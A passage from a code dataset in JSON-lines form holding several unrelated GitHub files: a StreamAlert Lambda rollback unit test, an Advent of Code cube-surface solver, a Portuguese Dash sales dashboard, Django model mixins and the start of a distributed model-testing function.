\"w\")\nfout.write(output)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2374.py","file_name":"2374.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"949116981","text":"\"\"\"Test ./manage.py lambda rollback functionality.\"\"\"\nimport unittest\n\nfrom mock import call, patch\nfrom nose.tools import assert_equal\n\nfrom stream_alert_cli.manage_lambda import rollback\nfrom tests.unit.helpers.base import basic_streamalert_config, MockCLIConfig\n\n\nclass MockOptions(object):\n \"\"\"Simple mock for the options parsed from the command line arguments.\"\"\"\n\n def __init__(self, clusters, processor):\n self.clusters = clusters\n self.processor = processor\n\n\n@patch.object(rollback, 'LOGGER_CLI')\n@patch.object(rollback, 'terraform_generate', return_value=True)\n@patch.object(rollback.helpers, 'tf_runner')\nclass RollbackTest(unittest.TestCase):\n \"\"\"Test the config updates and Terraform targets affected during a Lambda rollback.\"\"\"\n\n def setUp(self):\n self.config = MockCLIConfig(config=basic_streamalert_config())\n\n # Find all function config sections (with 'current_version')\n self.alert_merger_config = self.config['lambda']['alert_merger_config']\n self.alert_config = self.config['lambda']['alert_processor_config']\n self.apps_config_box = (\n self.config['clusters']['corp']['modules']['stream_alert_apps']['box_collector'])\n self.apps_config_duo = (\n self.config['clusters']['corp']['modules']['stream_alert_apps']['duo_admin_collector'])\n self.athena_config = self.config['lambda']['athena_partition_refresh_config']\n self.downloader_config = self.config['lambda']['threat_intel_downloader_config']\n self.rule_config_prod = (\n self.config['clusters']['prod']['modules']['stream_alert']['rule_processor'])\n self.rule_config_corp = (\n 
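`_terminate_process` above follows the usual escalation: close the pipes, `terminate()`, wait, then `kill()`. The same mechanics condensed into a standalone helper (`stop_child` is a made-up name); unlike the original, this only kills once the grace period expires:

```python
import subprocess

def stop_child(proc: subprocess.Popen, grace: float = 60.0) -> None:
    for stream in (proc.stdin, proc.stdout, proc.stderr):
        if stream:
            stream.close()
    proc.terminate()                    # SIGTERM on POSIX
    try:
        proc.wait(timeout=grace)
    except subprocess.TimeoutExpired:
        proc.kill()                     # escalate to SIGKILL
```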
self.config['clusters']['corp']['modules']['stream_alert']['rule_processor'])\n\n self.func_configs = [\n self.alert_merger_config, self.alert_config, self.apps_config_box, self.apps_config_duo,\n self.athena_config, self.downloader_config, self.rule_config_prod, self.rule_config_corp\n ]\n\n def test_rollback_all(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback all\"\"\"\n options = MockOptions(None, ['all'])\n\n for config in self.func_configs:\n config['current_version'] = 3\n\n rollback.rollback(options, self.config)\n\n # Verify that all of the versions were rolled back\n for config in self.func_configs:\n assert_equal(config['current_version'], 2)\n\n mock_logger.assert_not_called()\n mock_generate.assert_called_once_with(config=self.config)\n mock_runner.assert_called_once_with(targets=[\n 'module.alert_merger_lambda',\n 'module.alert_processor_lambda',\n 'module.box_collector_corp',\n 'module.duo_admin_collector_corp',\n 'module.stream_alert_athena',\n 'module.stream_alert_corp',\n 'module.stream_alert_prod',\n 'module.threat_intel_downloader'\n ])\n\n def test_rollback_all_invalid(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback all invalid\"\"\"\n options = MockOptions(None, ['all'])\n\n # Versions $LATEST and 1 cannot be rolled back.\n self.alert_config['current_version'] = 1\n rollback.rollback(options, self.config)\n\n fmt = '%s cannot be rolled back from version %s'\n mock_logger.assert_has_calls([\n call.warn(fmt, 'alert_merger', '$LATEST'),\n call.warn(fmt, 'alert_processor', '1'),\n call.warn(fmt, 'duo_admin_collector_corp', '$LATEST'),\n call.warn(fmt, 'box_collector_corp', '$LATEST'),\n call.warn(fmt, 'athena_partition_refresh', '$LATEST'),\n call.warn(fmt, 'rule_processor_prod', '$LATEST'),\n call.warn(fmt, 'rule_processor_corp', '$LATEST'),\n call.warn(fmt, 'threat_intel_downloader_config', '$LATEST')\n ], any_order=True)\n\n # We should have returned early - no Terraform actions necessary\n mock_generate.assert_not_called()\n mock_runner.assert_not_called()\n\n def test_rollback_alert_processor(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback global alert processor\"\"\"\n options = MockOptions(None, ['alert'])\n self.alert_config['current_version'] = 5\n\n rollback.rollback(options, self.config)\n\n assert_equal(4, self.alert_config['current_version'])\n mock_logger.assert_not_called()\n mock_generate.assert_called_once_with(config=self.config)\n mock_runner.assert_called_once_with(targets=['module.alert_processor_lambda'])\n\n def test_rollback_rule_single_cluster(self, mock_runner, mock_generate, mock_logger):\n \"\"\"CLI - Lambda Rollback rule processor in one cluster\"\"\"\n options = MockOptions(['prod'], ['rule'])\n\n self.rule_config_corp['current_version'] = 2\n self.rule_config_prod['current_version'] = 2\n\n rollback.rollback(options, self.config)\n\n # Only the prod rule processor should have been rolled back\n assert_equal(2, self.rule_config_corp['current_version'])\n assert_equal(1, self.rule_config_prod['current_version'])\n\n mock_logger.assert_not_called()\n mock_generate.assert_called_once_with(config=self.config)\n mock_runner.assert_called_once_with(targets=['module.stream_alert_prod'])\n","repo_name":"royadityak/streamalert","sub_path":"tests/unit/stream_alert_cli/manage_lambda/test_rollback.py","file_name":"test_rollback.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} 
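The rollback tests above stack `patch.object` decorators on the class, so each test method receives the mocks bottom-up. The same mechanics in a runnable miniature, patching `json.dumps` purely for illustration:

```python
import json
import unittest
from unittest import mock

class DemoTest(unittest.TestCase):
    # patch.object swaps json.dumps for a MagicMock for the test's duration;
    # stacked decorators would hand their mocks to the method in reverse order.
    @mock.patch.object(json, "dumps", return_value="{}")
    def test_dumps_called(self, mock_dumps):
        self.assertEqual(json.dumps({"a": 1}), "{}")
        mock_dumps.assert_called_once_with({"a": 1})

if __name__ == "__main__":
    unittest.main()
```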
+{"seq_id":"43720122292","text":"#!/usr/bin/python3\n\nimport sys\nsys.setrecursionlimit(5000)\n\npart2 = True\nlines = open('i.txt', 'r').read().strip().split('\\n')\n\ncoord = []\nfor line in lines:\n x, y, z = map(int, line.split(','))\n coord.append((x, y, z))\n\nmx = max(x for x, y, z in coord) + 1\nmy = max(y for x, y, z in coord) + 1\nmz = max(z for x, y, z in coord) + 1\n\nvolume = [[[0 for _ in range(mx)] for _ in range(my)] for _ in range(mz)]\n\nfor x, y, z in coord:\n volume[z][y][x] = 1\n\nconn = set()\n\ndef dfs(u, vol, v, c):\n global conn\n\n x, y, z = u\n\n if v[z][y][x] != -1:\n return\n\n v[z][y][x] = c\n\n if x - 1 >= 0:\n if vol[z][y][x - 1] == 0:\n dfs((x - 1, y, z), vol, v, c)\n else: conn.add(c)\n if x + 1 < mx:\n if vol[z][y][x + 1] == 0:\n dfs((x + 1, y, z), vol, v, c)\n else: conn.add(c)\n if y - 1 >= 0:\n if vol[z][y - 1][x] == 0:\n dfs((x, y - 1, z), vol, v, c)\n else: conn.add(c)\n if y + 1 < my:\n if vol[z][y + 1][x] == 0:\n dfs((x, y + 1, z), vol, v, c)\n else: conn.add(c)\n if z - 1 >= 0:\n if vol[z - 1][y][x] == 0:\n dfs((x, y, z - 1), vol, v, c)\n else: conn.add(c)\n if z + 1 < mz:\n if vol[z + 1][y][x] == 0:\n dfs((x, y, z + 1), vol, v, c)\n else: conn.add(c)\n\nv = [[[-1 for _ in range(mx)] for _ in range(my)] for _ in range(mz)]\nc = 0\nfor z in range(mz):\n for y in range(my):\n for x in range(mx):\n if v[z][y][x] == -1 and volume[z][y][x] == 0:\n dfs((x, y, z), volume, v, c)\n c += 1\n\nsa = 0\nfor x, y, z in coord:\n if x - 1 >= 0:\n if v[z][y][x - 1] in conn or not part2:\n sa += 1 - volume[z][y][x - 1]\n else: sa += 1\n if x + 1 < mx:\n if v[z][y][x + 1] in conn or not part2:\n sa += 1 - volume[z][y][x + 1]\n else: sa += 1\n if y - 1 >= 0:\n if v[z][y - 1][x] in conn or not part2:\n sa += 1 - volume[z][y - 1][x]\n else: sa += 1\n if y + 1 < my:\n if v[z][y + 1][x] in conn or not part2:\n sa += 1 - volume[z][y + 1][x]\n else: sa += 1\n if z - 1 >= 0:\n if v[z - 1][y][x] in conn or not part2:\n sa += 1 - volume[z - 1][y][x]\n else: sa += 1\n if z + 1 < mz:\n if v[z + 1][y][x] in conn or not part2:\n sa += 1 - volume[z + 1][y][x]\n else: sa += 1\n\nprint(sa)\n","repo_name":"IljaSobolev/aoc2022","sub_path":"d18/d18.py","file_name":"d18.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18788247343","text":"import dash\nfrom dash import html\nimport pandas as pd\nimport dash_bootstrap_components as dbc\nfrom dash import Input, Output, State, html, dash_table, callback, dcc\nfrom db import consulta\nimport plotly.express as px\nfrom datetime import datetime\n\ndash.register_page(__name__, path='/',name='Página Inicial')\n\ndef tabelas():\n \"\"\" Tabelas da página inicial. 
\"\"\"\n colunas = ['Id', 'Nome', 'Idade', 'Data de Admissão', 'Setor', 'Estado']\n lista = []\n recset = consulta('select * from pessoa')\n for rec in recset:\n lista.append(rec)\n dfTC = pd.DataFrame(lista, columns=colunas)\n dfTC = dfTC.sort_values(by=['Id'])\n dfTC = dfTC.reset_index(drop=True)\n dfTC['Data de Admissão'] = pd.to_datetime(dfTC['Data de Admissão']).dt.strftime('%d/%m/%Y')\n\n dfTCg = dfTC.groupby(['Estado','Setor']).count()\n dfTCg = dfTCg.rename(columns={'Nome':'Colaboradores'})\n dfTCg = dfTCg['Colaboradores']\n dfTCg = dfTCg.reset_index()\n\n figdfTC = px.bar(dfTCg, x=\"Estado\", y=\"Colaboradores\", color=\"Setor\", barmode=\"group\", text_auto=True)\n figdfTC.update_traces(textposition=\"outside\")\n\n colunas = ['Id', 'Nome', 'Valor', 'Categoria', 'Estoque']\n lista = []\n recset = consulta('select * from produto')\n for rec in recset:\n lista.append(rec)\n dfTP = pd.DataFrame(lista, columns=colunas)\n dfTP = dfTP.sort_values(by=['Id'])\n dfTP = dfTP.reset_index(drop=True)\n dfTP['Valor'] = dfTP['Valor'].apply(lambda x: f'R$ {x:_.2f}'.replace('.', ',').replace('_', '.'))\n\n dfTPg = dfTP[['Nome', 'Estoque', 'Categoria']]\n dfTPg = dfTPg.rename(columns={'Nome':'Produtos'})\n dfTPg = dfTPg[dfTPg['Estoque'] <= 5]\n\n figdfTP = px.bar(dfTPg, x=\"Estoque\", y=\"Produtos\", color=\"Categoria\", text_auto=True, orientation='h')\n figdfTP.update_traces(textposition=\"outside\")\n\n colunas = ['Id', 'Nome', 'CPF', 'Data de Inclusão', 'Status', 'Estado']\n lista = []\n recset = consulta('select * from cliente')\n for rec in recset:\n lista.append(rec)\n dfCL = pd.DataFrame(lista, columns=colunas)\n dfCL = dfCL.sort_values(by=['Id'])\n dfCL = dfCL.reset_index(drop=True)\n\n dfCLg = dfCL.groupby(['Estado','Status']).count()\n dfCLg = dfCLg.rename(columns={'Nome':'Clientes'})\n dfCLg = dfCLg['Clientes']\n dfCLg = dfCLg.reset_index()\n\n figdfCL = px.bar(dfCLg, x=\"Estado\", y=\"Clientes\", color=\"Status\", text_auto=True)\n figdfCL.update_traces(textposition=\"outside\")\n\n colunas = ['Id Pedido', 'Vendedor', 'Cliente', 'Total', 'Data']\n lista = []\n recset = consulta('select * from pedido_lista')\n for rec in recset:\n lista.append(rec)\n PeLt = pd.DataFrame(lista, columns=colunas)\n PeLt = PeLt.sort_values(by=['Id Pedido'], ascending=False)\n PeLt = PeLt.reset_index(drop=True)\n PeLt['Total'] = PeLt['Total'].apply(lambda x: f'R$ {x:_.2f}'.replace('.', ',').replace('_', '.'))\n def criar_link(x):\n return f\"
      {x}\n      \"\n    def alinhar_link(x):\n        return f\"\n      {x}\n
      \"\n PeLt['Vendedor'] = PeLt['Vendedor'].apply(lambda x: alinhar_link(x))\n PeLt['Cliente'] = PeLt['Cliente'].apply(lambda x: alinhar_link(x))\n PeLt['Vendedor'] = PeLt['Vendedor'].apply(lambda x: alinhar_link(x))\n PeLt['Total'] = PeLt['Total'].apply(lambda x: alinhar_link(x))\n PeLt['Data'] = PeLt['Data'].apply(lambda x: alinhar_link(x))\n PeLt['Id Pedido'] = PeLt['Id Pedido'].apply(lambda x: criar_link(x))\n\n colunas = ['Id Transação', 'Id Vendedor', 'Valor', 'Quantidade', 'Data']\n lista = []\n recset = consulta('select idtransacao, idvendedor, valor, quantidade, iddata from pedido')\n for rec in recset:\n lista.append(rec)\n PeG = pd.DataFrame(lista, columns=colunas)\n PeG = PeG.sort_values(by=['Id Transação'])\n PeG = PeG.reset_index(drop=True)\n\n PeG['Mês'] = PeG['Data'].apply(lambda x: datetime.strptime(x, '%d/%m/%Y %H:%M'))\n PeG = PeG[(PeG['Mês'] >= datetime.strptime(f\"{datetime.today().day}/{(datetime.today().month - 6) if (datetime.today().month - 6) > 0 else (12 + (datetime.today().month - 6))}/{datetime.today().year if (datetime.today().month - 6) > 0 else (datetime.today().year - 1)}\", '%d/%m/%Y')) & (PeG['Mês'] <= datetime.today())]\n PeG2 = PeG.copy()\n PeG2['Total'] = PeG2['Quantidade'] * PeG2['Valor']\n PeG2['Mês'] = PeG2['Mês'].apply(lambda x: datetime.strptime(datetime.strftime(x, '%b - %Y'), '%b - %Y'))\n PeG2 = PeG2[['Mês', 'Total']].groupby(['Mês'],).sum().reset_index()\n \n figdfPe = px.line(PeG2, x='Mês', y=\"Total\", text=\"Total\")\n figdfPe.update_traces(textposition=\"top center\")\n\n return [\n dbc.Tabs(\n [\n dbc.Tab(\n #Tabela colaboradores tela inicial\n label=\"Colaboradores\",\n tab_id=\"colaboradores\",\n children = [\n html.H1(\"Consulta Colaboradores\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaColaboradores',\n columns=[\n {\"name\": i, \"id\": i} for i in dfTC.columns\n ],\n data=dfTC.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n style_data = {'textAlign': 'center'},\n filter_action=\"native\",\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Colaboradores por Setor/Estado\"],\n style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dcc.Graph(\n id='grafico-colaboradores',\n figure=figdfTC,\n config={\"displayModeBar\": False}\n ),\n ],\n ),\n dbc.Tab(\n #Tabela produto tela inicial\n label=\"Produtos\",\n tab_id=\"Produtos\",\n children = [\n html.H1(\"Consulta Produtos\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaProdutos',\n columns=[\n {\"name\": i, \"id\": i} for i in dfTP.columns\n ],\n data=dfTP.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n filter_action=\"native\",\n style_data = {'textAlign': 'center'},\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Produtos com Baixo Estoque\"],\n 
style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dbc.InputGroup(\n [\n dbc.InputGroupText(\"Mínimo:\"), \n dbc.Input(placeholder=\"Inserir valor mínimo\", type=\"number\", id='idmin', value=0),\n dbc.InputGroupText(\"Máximo:\"),\n dbc.Input(placeholder=\"Inserir valor máximo\", type=\"number\", id='idmax', value=5),\n dbc.Button('Pesquisar', id='botaoPesquisarG2'),\n ],\n className=\"mb-3\",\n style={'margin-top': '2%'}\n ),\n html.Div(\n [\n dcc.Graph(\n id='grafico-produtos',\n figure=figdfTP,\n config={\"displayModeBar\": False}\n ),\n ],\n id='alt-grafico-produtos'\n ),\n ],\n ),\n dbc.Tab(\n #Tabela produto tela inicial\n label=\"Clientes\",\n tab_id=\"Clientes\",\n children = [\n html.H1(\"Consulta Clientes\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaClientes',\n columns=[\n {\"name\": i, \"id\": i} for i in dfCL.columns\n ],\n data=dfCL.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n filter_action=\"native\",\n style_data = {'textAlign': 'center'},\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Clientes por Estado\"],\n style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dcc.Graph(\n id='grafico-clientes',\n figure=figdfCL,\n config={\"displayModeBar\": False}\n ),\n ],\n ),\n dbc.Tab(\n #Tabela produto tela inicial\n label=\"Pedidos\",\n tab_id=\"Pedidos\",\n children = [\n html.H1(\"Consulta Pedidos\", style={'textAlign': 'center', 'margin-top': '1%', 'margin-bottom': '1%'}),\n dash_table.DataTable(\n id='tabelaPedidos',\n columns=[\n {\"name\": i, \"id\": i, \"presentation\": \"markdown\"} for i in PeLt.columns\n ],\n data=PeLt.to_dict('records'),\n style_header = {'textAlign': 'center', 'font-weight':'bold'},\n filter_action=\"native\",\n style_data = {'textAlign': 'center'},\n filter_options = {'placeholder_text':'Filtar Dados...'},\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n persistence=True,\n cell_selectable=False,\n markdown_options={\"html\": True}\n ),\n html.Hr(style={'margin-top': '1%', 'margin-bottom': '1%'}),\n html.H2(\n [\"Gráficos\"],\n style={'margin-top': '1%', 'margin-bottom': '1%', 'textAlign': 'center'},\n ),\n html.H4(\n [\"Relação Valor dos Pedidos por Data (Padrão 6 Meses)\"],\n style={'margin-top': '1%', 'margin-bottom': '1%'},\n ),\n dbc.InputGroup(\n [\n dbc.InputGroupText(\"Data: \"), \n dbc.Input(placeholder=\"Inserir data inicial\", type=\"date\", id='datamin'),\n dbc.InputGroupText(\" Até \"),\n dbc.Input(placeholder=\"Inserir data final\", type=\"date\", id='datamax'),\n dbc.Button('Pesquisar', id='botaoPesquisarG4'),\n ],\n className=\"mb-3\",\n style={'margin-top': '2%'}\n ),\n html.Div(\n [\n dcc.Graph(\n id='grafico-pedidos',\n figure=figdfPe,\n config={\"displayModeBar\": False}\n ),\n ],\n id='alt-grafico-pedidos'\n ),\n ],\n ),\n ],\n id=\"tabs\",\n persistence='True',\n ),\n ]\n\nlayout = html.Div(children=[\n html.Div(\n dbc.Button(\"Atualizar Dados\", color=\"warning\", className=\"mb-3\", id='atualizar'),\n ),\n html.Div(\n [],\n id='tabelas',\n className='output-example-loading',\n ),\n])\n\n@callback(\n Output(\"tabelas\", \"children\"),\n Input(\"atualizar\", \"n_clicks\"),\n)\ndef 
tabelasFunc(n1):\n \"\"\" Função botão atualizar informações tabelas iniciais. \"\"\"\n if n1:\n return tabelas()\n return tabelas()\n\n@callback(\n Output(\"alt-grafico-produtos\", \"children\"),\n Input(\"botaoPesquisarG2\", \"n_clicks\"),\n State(\"alt-grafico-produtos\", \"children\"),\n State(\"idmin\", \"value\"),\n State(\"idmax\", \"value\"),\n )\ndef tabelaProdutos(n_clicks, n1, v1, v2):\n \"\"\" Inserir sacola \"\"\"\n global dfTP\n if n_clicks:\n if v1 == None or v2 == None:\n return n1\n else:\n colunas = ['Id', 'Nome', 'Valor', 'Categoria', 'Estoque']\n lista = []\n recset = consulta('select * from produto')\n for rec in recset:\n lista.append(rec)\n dfTP = pd.DataFrame(lista, columns=colunas)\n dfTP = dfTP.sort_values(by=['Id'])\n dfTP = dfTP.reset_index(drop=True)\n dfTP['Valor'] = dfTP['Valor'].apply(lambda x: f'R$ {x:_.2f}'.replace('.', ',').replace('_', '.'))\n\n dfTPg = dfTP[['Nome', 'Estoque', 'Categoria']]\n dfTPg = dfTPg.rename(columns={'Nome':'Produtos'})\n dfTPg = dfTPg[(dfTPg['Estoque'] >= v1) & (dfTPg['Estoque'] <= v2)]\n\n figdfTP = px.bar(dfTPg, x=\"Estoque\", y=\"Produtos\", color=\"Categoria\", text_auto=True, orientation='h')\n figdfTP.update_traces(textposition=\"outside\")\n\n return [\n dcc.Graph(\n id='grafico-produtos',\n figure=figdfTP,\n config={\"displayModeBar\": False}\n ),\n ]\n return n1\n\n@callback(\n Output(\"alt-grafico-pedidos\", \"children\"),\n Input(\"botaoPesquisarG4\", \"n_clicks\"),\n State(\"alt-grafico-pedidos\", \"children\"),\n State(\"datamin\", \"value\"),\n State(\"datamax\", \"value\"),\n )\ndef tabelaPedidos(n_clicks, n1, v1, v2):\n \"\"\" Inserir sacola \"\"\"\n global dfTP\n if n_clicks:\n if v1 == None or v2 == None or v1 == \"\" or v2 == \"\":\n return n1\n else:\n colunas = ['Id Transação', 'Id Vendedor', 'Valor', 'Quantidade', 'Data']\n lista = []\n recset = consulta('select idtransacao, idvendedor, valor, quantidade, iddata from pedido')\n for rec in recset:\n lista.append(rec)\n PeG = pd.DataFrame(lista, columns=colunas)\n PeG = PeG.sort_values(by=['Id Transação'])\n PeG = PeG.reset_index(drop=True)\n\n print(f'{v1} - {v2}')\n\n PeG['Mês'] = PeG['Data'].apply(lambda x: datetime.strptime(x, '%d/%m/%Y %H:%M'))\n PeG = PeG[(PeG['Mês'] >= datetime.strptime(v1, '%Y-%m-%d')) & (PeG['Mês'] <= datetime.strptime(v2, '%Y-%m-%d'))]\n PeG2 = PeG.copy()\n PeG2['Total'] = PeG2['Quantidade'] * PeG2['Valor']\n PeG2['Mês'] = PeG2['Mês'].apply(lambda x: datetime.strptime(datetime.strftime(x, '%b - %Y'), '%b - %Y')) \n PeG2 = PeG2[['Mês', 'Total']].groupby(['Mês'],).sum().reset_index()\n\n figdfPe = px.line(PeG2, x='Mês', y=\"Total\", text=\"Total\")\n figdfPe.update_traces(textposition=\"top center\")\n return [\n dcc.Graph(\n id='grafico-pedidos',\n figure=figdfPe,\n config={\"displayModeBar\": False}\n ),\n ]\n return n1","repo_name":"williamrdarosa/mini-sistema","sub_path":"pages/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":18715,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36474002050","text":"from datetime import timedelta\nfrom decimal import Decimal\nfrom typing import List\nfrom uuid import UUID\n\nfrom django.db import models\nfrom django.db.models import Field\nfrom django.utils import timezone\nimport django\nif django.VERSION >= (4, 0):\n from django.utils.translation import gettext_lazy as _\nelse:\n from django.utils.translation import ugettext_lazy as _ # pragma: no cover\n\nfrom gpp.datetimes import dt\nfrom gpp.model.fields import 
CompressedTextField\n\n\ndef default_value(field: Field):\n \"\"\"\n models.field에 형태에 임의의 값 반환\n\n :param field: models.Field instance\n :type field: models.Field\n :return:\n :rtype: Union[int, date, time, datetime, timedelta, byte, int, ...]\n \"\"\"\n mapping = [\n (models.CharField, '1'),\n (models.IntegerField, 1),\n (models.DateTimeField, dt(2020, 1, 1)),\n (models.DateField, dt(2020, 1, 1).date()),\n (models.TimeField, dt(2020, 1, 1).time()),\n (models.DecimalField, Decimal('123.456')),\n (models.DurationField, timedelta(seconds=1)),\n (models.BooleanField, True),\n (models.UUIDField, UUID('280a8a4d-a27f-4d01-b031-2a003cc4c039')),\n (CompressedTextField, 'abc'),\n (models.BinaryField, b'abc'),\n (models.TextField, '1'),\n (models.GenericIPAddressField, '1.1.1.1'),\n (models.FilePathField, '/a.txt'),\n (models.FloatField, 1.0),\n ]\n for f, v in mapping:\n if isinstance(field, f):\n return v\n\n\nclass BaseModelMixin(models.Model):\n \"\"\"\n PK mixin\n \"\"\"\n id = models.BigAutoField(primary_key=True)\n created = models.DateTimeField(_('created date'), blank=True, editable=False)\n modified = models.DateTimeField(_('modified date'), blank=True, editable=False)\n\n class Meta:\n abstract = True\n\n @classmethod\n def dummy(cls, save=False, **kwargs):\n \"\"\"\n dummy 데이터 생성\n\n :param save: DB 저장 여부\n :type save: bool\n :param kwargs: parameter\n :type kwargs: dict\n :return: instance\n :type: Type[cls]\n \"\"\"\n for field in cls._meta.fields:\n if field.attname in {'id'}:\n continue\n if field.attname not in kwargs:\n kwargs.update({field.attname: default_value(field)})\n\n instance = cls(**kwargs)\n if save:\n instance.save()\n return instance\n\n def save(self, *args, **kwargs):\n now = timezone.now()\n if not self.created:\n self.created = now\n if 'update_fields' in kwargs:\n kwargs['update_fields'].append('created')\n\n update_fields = kwargs.get('update_fields', None)\n if not update_fields:\n self.modified = now\n elif isinstance(update_fields, list) and 'modified' not in update_fields:\n self.modified = now\n update_fields.append('modified')\n\n super(BaseModelMixin, self).save(*args, **kwargs)\n\n\nclass TaskModelMixin(models.Model):\n \"\"\"\n Async Task 모델 Mixin\n Task Status와 관련된 field 모음.\n \"\"\"\n CHOICE_TASK_STATUS_QUEUED = 10 # push to MQ\n CHOICE_TASK_STATUS_PROGRESSING = 20 # pop from MQ\n CHOICE_TASK_STATUS_ERROR = 30 # something wrong...\n CHOICE_TASK_STATUS_COMPLETED = 40 # complete\n\n CHOICE_TASK_STATUS = (\n (CHOICE_TASK_STATUS_QUEUED, _('in queued')),\n (CHOICE_TASK_STATUS_PROGRESSING, _('in processing')),\n (CHOICE_TASK_STATUS_ERROR, _('error')),\n (CHOICE_TASK_STATUS_COMPLETED, _('completed')),\n )\n\n task_status = models.PositiveSmallIntegerField(\n _('status of crawling task'),\n choices=CHOICE_TASK_STATUS,\n default=CHOICE_TASK_STATUS_QUEUED,\n )\n queued_datetime = models.DateTimeField(_('queued datetime'), null=True, blank=True, default=None)\n processing_datetime = models.DateTimeField(_('processing datetime'), null=True, blank=True, default=None)\n error_datetime = models.DateTimeField(_('error datetime'), null=True, blank=True, default=None)\n completed_datetime = models.DateTimeField(_('completed datetime'), null=True, blank=True, default=None)\n\n def set_completed(self, save: bool, update_fields: List):\n self.task_status = self.CHOICE_TASK_STATUS_COMPLETED\n self.completed_datetime = timezone.now()\n\n # cache를 이용할 때는 queued, processing 데이터가 없음.\n if not self.queued_datetime:\n self.queued_datetime = self.completed_datetime\n 
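default_value above returns the first match in mapping, so the order of the tuples matters: Django's DateTimeField subclasses DateField, and the mapping lists the subclass first so a DateTimeField gets a datetime rather than a date. A quick check, assuming Django settings are configured and using the module's dt helper:

from django.db import models

assert default_value(models.CharField()) == '1'
assert default_value(models.DateTimeField()) == dt(2020, 1, 1)      # subclass checked first
assert default_value(models.DateField()) == dt(2020, 1, 1).date()
assert default_value(models.FloatField()) == 1.0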
update_fields.append('queued_datetime')\n\n if not self.processing_datetime:\n self.processing_datetime = self.completed_datetime\n update_fields.append('processing_datetime')\n\n if save:\n self.save(\n update_fields=update_fields + ['task_status', 'completed_datetime']\n )\n\n def set_error(self, save: bool, msg: str, update_fields: List):\n self.task_status = self.CHOICE_TASK_STATUS_ERROR\n self.error_datetime = timezone.now()\n\n # cache를 이용할 때는 queued, processing 데이터가 없음.\n if not self.queued_datetime:\n self.queued_datetime = self.error_datetime\n update_fields.append('queued_datetime')\n\n if not self.processing_datetime:\n self.processing_datetime = self.error_datetime\n update_fields.append('processing_datetime')\n\n if save:\n self.save(\n update_fields=update_fields + ['task_status', 'error_datetime']\n )\n\n def set_processing(self, save: bool, update_fields: List):\n self.task_status = self.CHOICE_TASK_STATUS_PROGRESSING\n self.processing_datetime = timezone.now()\n\n if not self.queued_datetime:\n self.queued_datetime = self.processing_datetime\n update_fields.append('queued_datetime')\n\n if save:\n self.save(\n update_fields=update_fields + ['task_status', 'processing_datetime']\n )\n\n @property\n def is_queued_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_QUEUED\n\n @property\n def is_processing_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_PROGRESSING\n\n @property\n def is_error_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_ERROR\n\n @property\n def is_completed_task(self):\n return self.task_status == self.CHOICE_TASK_STATUS_COMPLETED\n\n @property\n def task_badge_class(self):\n mapping = {\n self.CHOICE_TASK_STATUS_QUEUED: 'bg-secondary',\n self.CHOICE_TASK_STATUS_PROGRESSING: 'bg-info',\n self.CHOICE_TASK_STATUS_ERROR: 'bg-danger',\n self.CHOICE_TASK_STATUS_COMPLETED: 'bg-success',\n }\n return mapping.get(self.task_status, '')\n\n class Meta:\n abstract = True\n","repo_name":"Gaolious/py_extension_functions","sub_path":"gpp/model/base_mixins.py","file_name":"base_mixins.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3995434314","text":"import torch\nimport torch.nn as nn\nfrom global_variables.common import get_is_checkpoint, get_worker_num\n\nfrom global_variables.config import cfg\nfrom models.general_model import init_model\nfrom models.mobilenetv2.model import MobileNetV2\nfrom utils.general import weight_sync\nimport math\nimport time\n\n\ndef test_distribute(test_dataloader, epoch):\n \"\"\"\n test model on test_dataloader under distributed environment\n \"\"\"\n # 这里采取的方法是同步权重,在本地进行 test\n print(\"Synchronizing 